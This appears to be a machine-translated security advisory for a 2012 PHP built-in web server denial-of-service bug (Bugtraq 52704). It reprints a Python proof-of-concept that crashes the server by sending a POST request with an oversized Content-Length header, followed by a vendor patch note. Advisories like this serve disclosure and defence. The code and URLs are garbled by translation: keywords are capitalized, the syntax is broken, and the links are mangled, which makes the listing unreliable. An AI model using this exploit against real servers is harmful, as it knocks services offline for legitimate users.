PHP 'content-length' header remote Service Access Vulnerability

Release date: 2012-03-24
Updated on: 2012-03-27

Affected Systems:
PHP 5.5.0-DEV
PHP 5.4.1RC1-DEV
Description:
--------------------------------------------------------------------------------
Bugtraq id: 52704

PHP is a script language running on a computer. It is mainly used to process dynamic web pages, including command line interfaces or graphical user interface programs.

PHP has a remote denial of service vulnerability in implementation. If an HTTP request with a large Content-Length header value is sent to the built-in PHP network server, attackers can exploit this vulnerability to exhaust available memory and reject legal users.

<* Source: vendor

Link: https://bugs.php.net/bug.php? Id = 61461

*>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!

#! /Usr/bin/python

# Title: PHP 5.4.0 Built-in Web Server DoS PoC
# Date: 16 march2012
# Author: ls (contact@kaankivilcim.com)
# Reference: https://bugs.php.net/bug.php? Id = 61461
# Comments: Fixed in PHP 5.4.1RC1-DEV and 5.5.0-DEV

# The value of the Content-Length header is passed directly to a pemalloc () call in sapi/cli/php_cli_server.c
# On line 1538. The inline function defined within Zend/zend_alloc.h for malloc () will fail, and will terminate
# The process with the error message "Out of memory ".
#
#1537 if (! Client-> request. content ){
#1538 client-> request. content = pemalloc (parser-> content_length, 1 );
#1539 client-> request. content_len = 0;
#1540}
#
# PHP 5.4.0 Development Server started at Tue Mar 13 19:41:45 2012
# Listening on 127.0.0.1: 80
# Document root is/tmp
# Press Ctrl-C to quit.
# Out of memory

Import socket, sys

Target = "127.0.0.1"
Port = 80;

Request = "POST/HTTP/1.1 \ n"
Request + = "Content-Type: application/x-www-form-urlencoded \ n"
Request + = "Content-Length: 2147483638 \ n" # <-- Choose size larger than the available memory on target
Request + = "A = B \ n"

S = socket. socket (socket. AF_INET, socket. SOCK_STREAM)

Try:
S. connect (target, port ))
Except t:
Print "[-] Connection to % s: % s failed! "% (Target, port)
Sys. exit (0)

Print "[+] Sending HTTP request. Check for crash on target ."

S. send (request)
S. close ()

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:

PHP
---
The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:

Http://www.php.net